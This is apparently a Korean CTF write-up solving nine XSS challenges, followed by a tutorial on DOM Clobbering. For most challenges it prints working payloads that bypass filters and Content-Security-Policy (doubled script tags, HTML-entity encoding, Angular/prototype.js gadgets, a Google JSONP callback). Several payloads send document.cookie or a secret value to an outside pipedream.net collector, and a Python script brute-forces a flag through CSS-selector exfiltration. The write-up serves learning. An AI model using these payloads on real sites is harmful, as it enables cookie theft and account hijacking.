Wargame

Mini CTF (XSS)

남바오 2023. 3. 17. 23:03

1번

1번 문제는 아무 제약조건이 없어서

로 해결할 수 있었다.

2번

페이지 소스를 보면,

script와 img를 공백으로 대체하고 있다.

$q = $_GET['q'];
$q = str_replace("<script","",$q);
$q = str_replace("<img","",$q);

간단하게 script를 두 번 써주면 해결되는 문제였다.

Payload
<scr<scriptipt>location.href='https://eoe4b2t4ui5w640.m.pipedream.net/'%2bdocument.cookie;</scr<scriptipt>

3번

페이지 소스를 보면,

$q = $_GET['q'];
$q = str_replace("document.cookie","x-document.cookie",$q);
    echo $q;

?></h1>

document.cookie를 필터링하고 있기 때문에 [’ ‘] 를 사용해서 우회했다.

PAYLOAD

4번

페이지 소스를 보면, 문자를 대문자로 바꾸는 함수가 사용되고 있다.

대문자 되는 것을 방지하기 위해 HTML entity encoder를 활용하였다.

문제는 글자수 제한이 500으로 걸려있어서 주로 사용하던 pipedream 서버로는 보내지 못하여 외부 서버로 보내는 방법을 선택하였다.

$q = $_GET['q'];
$q = strtoupper($q);

entity encode location.href='[https://eoe4b2t4ui5w640.m.pipedream.net/'+document.cookie](https://eoe4b2t4ui5w640.m.pipedream.net/'+document.cookie);
img 속성에 넣기 <img src=a onerror="location.href='[https://eoe4b2t4ui5w640.m.pipedream.net/'+document.cookie](https://eoe4b2t4ui5w640.m.pipedream.net/'+document.cookie)">
url encode http://wuq.kr:9090/xss4.php?q=<img src%3Da onerror%3D"%26%23x6C%3B%26%23x6F%3B%26%23x63%3B%26%23x61%3B%26%23x74%3B%26%23x69%3B%26%23x6F%3B%26%23x6E%3B.%26%23x68%3B%26%23x72%3B%26%23x65%3B%26%23x66%3B%3D'https%3A%2F%2Feoe4b2t4ui5w640.m.pipedream.net%2F'%2B%26%23x64%3B%26%23x6F%3B%26%23x63%3B%26%23x75%3B%26%23x6D%3B%26%23x65%3B%26%23x6E%3B%26%23x74%3B.%26%23x63%3B%26%23x6F%3B%26%23x6F%3B%26%23x6B%3B%26%23x69%3B%26%23x65%3B">

5번

페이지 소스를 보면, 로컬환경으로 실행해야지만 flag를 얻을 수 있었다.

로컬에서 보낸 것처럼 로컬에서 보내고 reconnect를 해주었다.

이번 문제에서는 FLAG{fake_flag}에 있는 값을 document.getElementById(’secret’).value을 이용해서 flag를 구하였다.

$sec_value = file_get_contents("/app/secret");
if($_SERVER['REMOTE_ADDR'] != "127.0.0.1"){
    $sec_value = "FLAG{fake_flag}";
}

?>
    <input id="secret" value="<?php echo $sec_value;?>">

PAYLOAD
<script> location.href="http://127.0.0.1/xss5.php?q=<script>location.href='https://eoe4b2t4ui5w640.m.pipedream.net/'+document.getElementById('secret').value;</script>"; </script>

6번

<style>
    <?php
        $q = str_replace('<','',$_GET['q']);
        $q = str_replace('>','',$q);
        echo $q;
    ?>
    </style>

6번 문제는 $_GET[’q’]가 <style>태그 안에 위치하고 있어 input[value^=] 를 활용하였다.

또 안에선, < 와 > 이 공백으로 치환되기 때문에 exploit code는 다음과 같이 처리하였다.

import requests
import string

def mysql(condition):
    url = '<http://wuq.kr:9090/report.php>'
    
    query = '<http://wuq.kr:9090/xss1.php?q=>location.href="<http://127.0.0.1/xss6.php?q=input[value^=\\'%s\\']>{ background: url(\\'<<a href=https://eoe4b2t4ui5w640.m.pipedream.net/%s>https://eoe4b2t4ui5w640.m.pipedream.net/%s</a>\\')}\\"'> query_final = query %(condition, condition) datas = {'url':query_final, 'submit':'1'} R = requests.post(url, data=datas) flag = 'FLAG{XSS6_ashd' for i in range(0x21,0x7E): pre_flag = flag + chr(i) print(pre_flag) mysql(pre_flag)

7번

7번부터는 CSP가 걸려있다.

 header("Content-Security-Policy: script-src 'self';");

사진과 같이 내 로컬 주소를 제출하면 txt값이 반환되고 이를 페이로드로 보내면 flag를 얻을 수 있었다.

PAYLOAD
http://wuq.kr:9090/xss7.php?q=<script src="http://wuq.kr:9090/upload/177e2ac8d70a59e5e5967d393fa0d89bfdf650ee.txt"></script>

8번

8번문제도 CSP가 걸려있었고, 구글링을 통해 CSP bypass 방법을 찾아서 angular와 prototype 자바스크립트를 이용해서 풀 수 있는 문제였다.

PAYLOADhttps://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js https://eoe4b2t4ui5w640.m.pipedream.net/xxxx'+document['cookie
']") }} </div>
"/></script><div ng-app ng-csp> {{ x = $on.curry.call().eval("location.href='
"></script><script src="
<script src="

처음에는 잘 보내지지 않았는데 URL 인코딩 후에 보내니 정상적으로 flag를 확인할 수 있었다.

9번

해당 문제에서는 *.google.com에서 오는 javascript만 허용하고 있다. 그렇기 때문에, 구글 서비스 중에서 javascript를 실행할 수 있는 걸 찾으면 문제는 해결된다.

Bypassing Content Security Policy 관련 문서를 찾아보았을 때,

https://accounts.google.com/o/oauth2/revoke?callback=alert(1) 와 같은 페이로드를 구할 수 있었다.

DOM Clobbering

DOM Clobbering?

DOM Clobbering은 Javascript에서의 DOM 처리 방식을 이용한 공격 기법이다.

이는 DOM Based XSS중 세부 공격 기법 중 하나로, 사용자가 HTML을 수정할 수 있는 경우 임의의 DOM 객체를 삽입하여 다른 DOM 객체를 삭제하거나 덮어쓰는 방식으로 변조하는 공격이다.

일반적인 Stored XSS, Reflected XSS 공격의 경우 HTTP Response에 악성 스크립트 구문이 포함되어 브라우저로 전달되지만, DOM based XSS의 경우 서버 응답에서 악성 스크립트 존재 여부를 감지할 수 있다.

공격 원리

form 태그에서 getElementById 를 사용하면, alert창이 띄어지지 않는 것을 볼 수 있다

DOM 환경에서 id가 같은 객체가 2개 이상 존재하면 HTML Collection 객체가 되어 아래와 같이 2개의 객체가 모두 인식된다.

<a id="aTag"></a>
<a id="aTag" name="hello" href="abcd" class="world">asdf</a>

: window.aTag로 접근했을 때, HTML Collection 이라는 객체가 반환된다.

먼저 선언된 a태그와 나중에 선언된 태그가 모두 존재하는 것을 확인할 수 있다.

여기서 중요한 것은 HTML Collection 객체에서 접근할 수 있는 하위객체가 2개가 존재한다는 점이다.

<aside> 💡 만약 id가 같은 2개 이상의 태그를 정확하게 구분하고 싶다면?

</aside>

<a id="aTag" name="a1"></a>
<a id="aTag" name="a2"></a>

Exploit

시나리오

사용자가 HTML을 컨트롤할 수 있는지 확인한다.
서비스 내 DOM 관련 취약(innerHTMl, eval(), document.write, location.href 등) 구간을 확인한다.
해당 구간을 컨트롤 할 수 있는 데이터에 window.test와 같이 DOM Clobbering이 가능한 지점을 찾는다.

value attribute

window.CONFIG.value 값을 변조하고 싶다면?


      window.CONFIG = window.CONFIG || {
          version:"2021.08.26",
          toLocation:"<<a href=http://example.com>http://example.com</a>>",
          value:"FLAG{fake_flag}"
      }
      if (window.CONFIG.value === "FLAG{helloworld}") {
          document.write('Congratulation!!! You know DOM Clobbering!!!');
      }else{ 
          document.write('Nope..!');
      }

window.CONFIG.value 는 "FLAG{fake_flag}"가 기본값으로 설정되어있다.

FLAG의 값을 변조하기 위해, a태그의 id 속성과 name 속성을 사용해볼 순 있지만 원하는 문자열로 바꾸긴 힘들다. 이 때, value 라는 속성을 기본적으로 내재하고 있는 태그를 이용한다면 변조가 가능하다.

input 태그의 value 속성을 이용한다면,

CONFIG라는 id를 할당해주고, value 속성에 원하는 값을 할당해주면 된다.


      window.CONFIG = window.CONFIG || {
          version:"2021.08.26",
          toLocation:"<<a href=http://example.com>http://example.com</a>>",
          value:"FLAG{fake_flag}"
      }
      if (window.CONFIG.value === "FLAG{helloworld}") {
          document.write('Congratulation!!! You know DOM Clobbering!!!');
      }else{ 
          document.write('Nope..!');
      }

a tag & area tag

<a> 태그와 <area> 태그의 객체 특성 상, 해당 객체를 문자열화(toString)할 경우에 href(URL)을 반환한다.

href 속성에 URL이 존재할 때, <a> 태그에서 toString() 함수를 호출할 경우, a태그가 문자열(URL)로 반환된다.

블로그 주소

javascript에서 객체와 문자열이 연산될 때에는 Object.toString() 함수가 실행된다. 이로 인해, <a>(객체)와 ‘’(빈문자열)을 + 한 경우에도 toString()함수가 호출되어, 결과적으로 href가 출력되게 된다.

해당 페이지에서 Redirect를 발생시켜, 다른 페이지로 이동시키고 싶다면?

<html> 
    <!--
    Code Injection Zone 
    -->
    <script>
        window.CONFIG = window.CONFIG ||{ 
       	    version:"2021.11.18",
            toLocation: null,
            value:"FLAG{fake_flag}"
        }
        if (window.CONFIG.toLocation != null) {
        	location.href = window.CONFIG.toLocation;
        }else{ 
        	document.write("nope...!");
        }
    </script>
</html>

location.href 의 값을 바꾸면 페이지의 URL이 변경된다.

if문 내에서 location.href에 window.CONFIG.toLocation이 대입되므로 해당 객체를 변조해야 한다.

location.href는 기본적으로 문자열 객체이고 window.CONFIG.toLocation 객체가 a 태그일 경우에 location.href에 대입될 때 toString()을 호출하게 된다.

시나리오를 짜보면,

a 태그를 2개 선언한다. → HTML Collection ⇒ name 속성을 사용하기 위해
2개의 태그 중에 하나의 name 속성을 “toLocation”으로 지정 → toLocation 객체를 변조하기 위해
name=”toLocation”인 a 태그의 href 속성을 URL로 지정한다.

```php
<html>
    **<a id="CONFIG"></a>
    <a id="CONFIG" name="toLocation" href="javascript:alert('XSS')"></a>**
    
    <script>
        window.CONFIG = window.CONFIG ||{
            version:"2021.11.18",
            toLocation: null,
            value:"FLAG{fake_flag}"
        }
        if (window.CONFIG.toLocation != null) {
                location.href = window.CONFIG.toLocation;
        }else{
                document.write("nope...!");
        }
    </script>
</html>